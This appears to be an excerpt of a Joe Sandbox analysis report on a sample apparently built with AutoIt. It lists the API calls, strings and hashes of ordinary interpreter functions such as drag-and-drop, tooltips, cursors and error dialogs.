Opcode ID: 103c02510f23a694eb99a264771d2685696d5d9f3fad64357fcbf210c95f471f
Instruction ID: 0fdec10b8968f214d071ed7a2176da413a42f1304e7ca03fb147f89748d70c2e
Opcode Fuzzy Hash: 103c02510f23a694eb99a264771d2685696d5d9f3fad64357fcbf210c95f471f
Instruction Fuzzy Hash: CF81B2711282069FDB05DF14C885FAA77E8FF45314F04846AFD899A092DF34DDA9CBA1

Function 002DC5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

DragQueryPoint.SHELL32(?,?), ref: 002DC627

Part of subcall function 002DAB37: ClientToScreen.USER32(?,?), ref: 002DAB60
Part of subcall function 002DAB37: GetWindowRect.USER32(?,?), ref: 002DABD6
Part of subcall function 002DAB37: PtInRect.USER32(?,?,002DC014), ref: 002DABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 002DC690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002DC69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002DC6BE
_wcscat.LIBCMT ref: 002DC6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 002DC705
SendMessageW.USER32(?,000000B0,?,?), ref: 002DC71E
SendMessageW.USER32(?,000000B1,?,?), ref: 002DC735
SendMessageW.USER32(?,000000B1,?,?), ref: 002DC757
DragFinish.SHELL32(?), ref: 002DC75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002DC851

Strings

@GUI_DRAGID, xrefs: 002DC7C9
pb1, xrefs: 002DC79B
@GUI_DROPID, xrefs: 002DC77E
@GUI_DRAGFILE, xrefs: 002DC800

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb1
API String ID: 169749273-3371520547
Opcode ID: 1b8dc524575648548c5e6ceca43b2134d84b652e2e48c7dc4775eb706c5ed4a7
Instruction ID: 8627e2140f9f3c9df9a3e886a13171346428f6d3830daf6e9cc6175edf3db542
Opcode Fuzzy Hash: 1b8dc524575648548c5e6ceca43b2134d84b652e2e48c7dc4775eb706c5ed4a7
Instruction Fuzzy Hash: AC618D71519301AFC701DF64DC89DABBBE8EF88310F00092EF991962A1DB709A59CF96

Function 002AABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 002AAC33

Strings

CLASSNAME=, xrefs: 002AAC70
ALL, xrefs: 002AACC7
[ALL, xrefs: 002AACD9
HANDLE=, xrefs: 002AAC2C
[HANDLE:, xrefs: 002AAC3F
REGEXP=, xrefs: 002AAC48
ACTIVE, xrefs: 002AAC0E
[REGEXPTITLE:, xrefs: 002AAC5B
LAST, xrefs: 002AABF8
[LAST, xrefs: 002AACE0
[ACTIVE, xrefs: 002AAC20
[CLASS:, xrefs: 002AAC83

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: cf28f1d9c0f0ed96c80ae85057c3bd70bf2844a908ff1d4d965819c47544b29e
Instruction ID: 8764bc7005fa34539bbba8d2cc7f50f4c350d571f74f1057e7f04d0f6ff4ed22
Opcode Fuzzy Hash: cf28f1d9c0f0ed96c80ae85057c3bd70bf2844a908ff1d4d965819c47544b29e
Instruction Fuzzy Hash: 8F31E830A69206ABEB15FA50DD13EEE7769AF11721F20001AF802711D1EF717F28CE56

Function 002C4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 002C5013
LoadCursorW.USER32(00000000,00007F00), ref: 002C501E
LoadCursorW.USER32(00000000,00007F03), ref: 002C5029
LoadCursorW.USER32(00000000,00007F8B), ref: 002C5034
LoadCursorW.USER32(00000000,00007F01), ref: 002C503F
LoadCursorW.USER32(00000000,00007F81), ref: 002C504A
LoadCursorW.USER32(00000000,00007F88), ref: 002C5055
LoadCursorW.USER32(00000000,00007F80), ref: 002C5060
LoadCursorW.USER32(00000000,00007F86), ref: 002C506B
LoadCursorW.USER32(00000000,00007F83), ref: 002C5076
LoadCursorW.USER32(00000000,00007F85), ref: 002C5081
LoadCursorW.USER32(00000000,00007F82), ref: 002C508C
LoadCursorW.USER32(00000000,00007F84), ref: 002C5097
LoadCursorW.USER32(00000000,00007F04), ref: 002C50A2
LoadCursorW.USER32(00000000,00007F02), ref: 002C50AD
LoadCursorW.USER32(00000000,00007F89), ref: 002C50B8
GetCursorInfo.USER32(?), ref: 002C50C8

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 8a3f4064e7aa5a79f208f60aa0874d899c26aae16a63a8ce911fca83ec9b5e8f
Instruction ID: a151e510e35440d052a3cec637df18fa31c557d870bf952a552c043bf9e6893c
Opcode Fuzzy Hash: 8a3f4064e7aa5a79f208f60aa0874d899c26aae16a63a8ce911fca83ec9b5e8f
Instruction Fuzzy Hash: A33115B1D1831A6ADF109FB68C89D5FBFE8FF08750F50452AA50DE7280DA78A540CF95

Function 002DA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002DA259
DestroyWindow.USER32(?,?), ref: 002DA2D3

Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002DA34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002DA36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002DA382
DestroyWindow.USER32(00000000), ref: 002DA3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00250000,00000000), ref: 002DA3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002DA3F4
GetDesktopWindow.USER32 ref: 002DA40D
GetWindowRect.USER32(00000000), ref: 002DA414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002DA42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002DA444

Part of subcall function 002525DB: GetWindowLongW.USER32(?,000000EB), ref: 002525EC

Strings

0, xrefs: 002DA26F
tooltips_class32, xrefs: 002DA346, 002DA3D4

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 9bfb588feb8fb2ae4f72226d928a6b3d8427a6ddaa5d3b37a042cfeff259e3fb
Instruction ID: e26d32ccbdc18a75820a6676708ad7e0352044c091c3cd385fba7fc63b18b902
Opcode Fuzzy Hash: 9bfb588feb8fb2ae4f72226d928a6b3d8427a6ddaa5d3b37a042cfeff259e3fb
Instruction Fuzzy Hash: 93717B71650205AFD725CF28DC49FA677EAFB88304F04451EF985872A0DBB0ED16CB56

Function 002D4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002D4424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002D446F

Strings

EXISTS, xrefs: 002D44D8
GETITEMCOUNT, xrefs: 002D4551
COLLAPSE, xrefs: 002D44B5
GETTEXT, xrefs: 002D45C2
GETSELECTED, xrefs: 002D457F
CHECK, xrefs: 002D448F
UNCHECK, xrefs: 002D464B
EXPAND, xrefs: 002D4521
GETTOTALCOUNT, xrefs: 002D4456
SELECT, xrefs: 002D4620
ISCHECKED, xrefs: 002D45F2

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: deacdedb3433cf26019a0218450a5ad3f30f39f820bcff118e1599d2a6d53075
Instruction ID: 110f30bbce071f843a133e531f6a3a83ca6dd06a31793362f8e1438932c07973
Opcode Fuzzy Hash: deacdedb3433cf26019a0218450a5ad3f30f39f820bcff118e1599d2a6d53075
Instruction Fuzzy Hash: D49190742247019FCB04EF10C851A6EB7E5AF95750F04886AFC965B3A2CB30EDA9CF85

Function 002DB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 002DB8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002D91C2), ref: 002DB910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002DB949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 002DB98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 002DB9C3
FreeLibrary.KERNEL32(?), ref: 002DB9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002DB9DF
DestroyIcon.USER32(?,?,?,?,?,002D91C2), ref: 002DB9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 002DBA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 002DBA17

Part of subcall function 00272EFD: __wcsicmp_l.LIBCMT ref: 00272F86

Strings

.dll, xrefs: 002DB86D
.icl, xrefs: 002DB82A
.exe, xrefs: 002DB84A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 4048f1ce422c76a99631a69cfe29914350e9139c77241ebbf325db2ed8d97bf9
Instruction ID: 8e4e26b8aac9e130534ba4d6cf2cc23d7a7f448160c374c0452a034853fa4737
Opcode Fuzzy Hash: 4048f1ce422c76a99631a69cfe29914350e9139c77241ebbf325db2ed8d97bf9
Instruction Fuzzy Hash: 4B61FD71920209FAEB15DF64DC55FFE7BA8EB08721F108116F915D62C0DB70AEA0DBA0

Function 002BA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC

CharLowerBuffW.USER32(?,?), ref: 002BA3CB
GetDriveTypeW.KERNEL32 ref: 002BA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002BA4C5

Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06

Strings

wait, xrefs: 002BA482
close cd wait, xrefs: 002BA4B0
close, xrefs: 002BA3D1
type cdaudio alias cd wait, xrefs: 002BA443
open , xrefs: 002BA427
open, xrefs: 002BA3F2
set cd door , xrefs: 002BA466
closed, xrefs: 002BA3DF, 002BA3E8

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: e145d23eb6761b4fc406a0bc5ff929be54156ebcd560372b949552dc079f334d
Instruction ID: 19ac910a164c82de3a4f685062d576c55a588d2f27b8a3053450fd3b530e5958
Opcode Fuzzy Hash: e145d23eb6761b4fc406a0bc5ff929be54156ebcd560372b949552dc079f334d
Instruction Fuzzy Hash: E7517E715243059FC700EF10C8958AAB3F8EF98759F00886DF89A572A1DB31ED1ACF96

Function 002AF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0028E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 002AF8DF
LoadStringW.USER32(00000000,?,0028E029,00000001), ref: 002AF8E8

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0028E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 002AF90A
LoadStringW.USER32(00000000,?,0028E029,00000001), ref: 002AF90D
__swprintf.LIBCMT ref: 002AF95D
__swprintf.LIBCMT ref: 002AF96E
_wprintf.LIBCMT ref: 002AFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 002AFA2E

Strings

Line %d (File "%s"):, xrefs: 002AF957
Line %d:, xrefs: 002AF968
^ ERROR, xrefs: 002AF9C3
Error: , xrefs: 002AF9E5
%s (%d) : ==> %s: %s %s, xrefs: 002AFA12

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 49e071fe3ec43a27d15fd8ddfa6020c50b0f00235ea4d1d9f844aed13a88764d
Instruction ID: 4e52f00090a6e9e1205cbf2804f6b2bd2b36ec81aadd005c7b084cbfaabae69f
Opcode Fuzzy Hash: 49e071fe3ec43a27d15fd8ddfa6020c50b0f00235ea4d1d9f844aed13a88764d
Instruction Fuzzy Hash: 92415D72851119ABCB05FBE0DE96DEE777CAF14301F100065F905760A2EE356F29CE64

Function 002DBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002D9207,?,?), ref: 002DBA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBA78
CloseHandle.KERNEL32(00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBA85
GlobalLock.KERNEL32(00000000), ref: 002DBA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBA9D
GlobalUnlock.KERNEL32(00000000), ref: 002DBAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,002E2CAC,?), ref: 002DBAD7
GlobalFree.KERNEL32(00000000), ref: 002DBAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 002DBB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 002DBB36
DeleteObject.GDI32(00000000), ref: 002DBB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002DBB74

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 7c5778aeb20d87902e08c08bfddcdd9e17e53128b66026370969da0f463d920f
Instruction ID: 52ae5256623716267d17d4403594a7664119e420874298fba9b6545dfeb6e663
Opcode Fuzzy Hash: 7c5778aeb20d87902e08c08bfddcdd9e17e53128b66026370969da0f463d920f
Instruction Fuzzy Hash: 32416A75A01205EFCB119F65ED8CEAA7BB8FF89711F11806AF90AD7260D7709E01CB60

Function 002BD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 002BDA10
_wcscat.LIBCMT ref: 002BDA28
_wcscat.LIBCMT ref: 002BDA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002BDA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 002BDA63
GetFileAttributesW.KERNEL32(?), ref: 002BDA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 002BDA95
SetCurrentDirectoryW.KERNEL32(?), ref: 002BDAA7

Strings

*.*, xrefs: 002BDAE6

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 1079e4f17675573dcf2f41d34c76bedc23fe94c44d61902d63e76eac0f531140
Instruction ID: 0ea81ae4062b4a1f473f579de04ccc1cecaa2d3df710c9aa37f4fb5ba3753965
Opcode Fuzzy Hash: 1079e4f17675573dcf2f41d34c76bedc23fe94c44d61902d63e76eac0f531140
Instruction Fuzzy Hash: 6481B2725246419FCB24EF64C844AEAB7E4AF89390F18882EF889C7251E730ED55CB52

Function 002DC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002DC1FC
GetFocus.USER32 ref: 002DC20C
GetDlgCtrlID.USER32(00000000), ref: 002DC217
_memset.LIBCMT ref: 002DC342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002DC36D
GetMenuItemCount.USER32(?), ref: 002DC38D
GetMenuItemID.USER32(?,00000000), ref: 002DC3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002DC3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002DC41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002DC454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002DC489

Strings

0, xrefs: 002DC33A

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 04898391893e8cb27ed21307415657950f88ea6de73307d257bdb83011d52953
Instruction ID: 43b31efb021860eb688b67ac1cf1362ec401e549a6ceddcc0b02d0a036fb236c
Opcode Fuzzy Hash: 04898391893e8cb27ed21307415657950f88ea6de73307d257bdb83011d52953
Instruction Fuzzy Hash: 4E819C706283429FD715DF14D894AAABBE8EF88314F20492EF99597391C770DD14CB92

Function 002C731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002C738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002C739B
CreateCompatibleDC.GDI32(?), ref: 002C73A7
SelectObject.GDI32(00000000,?), ref: 002C73B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 002C7408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 002C7444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 002C7468
SelectObject.GDI32(00000006,?), ref: 002C7470
DeleteObject.GDI32(?), ref: 002C7479
DeleteDC.GDI32(00000006), ref: 002C7480
ReleaseDC.USER32(00000000,?), ref: 002C748B

Strings

(, xrefs: 002C7410

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 0e0aa25b0e8b31870b4f18e3335586f074877f582ad2ccea6d22ff650b8377f4
Instruction ID: fcfb4fe30a7f447fc2b2304ba47adbf9e3a4b02a0baac77cf52701ce79df014f
Opcode Fuzzy Hash: 0e0aa25b0e8b31870b4f18e3335586f074877f582ad2ccea6d22ff650b8377f4
Instruction Fuzzy Hash: 27513771914209EFCB14CFA8DC89EAEBBB9EF48310F14852EF95A97210D771AD508F50

Function 00256A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00270957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00256B0C,?,00008000), ref: 00270973

Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00256BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00256CFA

Part of subcall function 0025586D: _wcscpy.LIBCMT ref: 002558A5

Part of subcall function 0027363D: _iswctype.LIBCMT ref: 00273645

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 0028E421
Bad directive syntax error, xrefs: 0028E79D
EA06, xrefs: 0028E452
Error opening the file, xrefs: 0028E43D, 0028E4B8
AU3!, xrefs: 00256B61
>>>AUTOIT SCRIPT<<<, xrefs: 0028E496
Unterminated string, xrefs: 0028E7E4

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

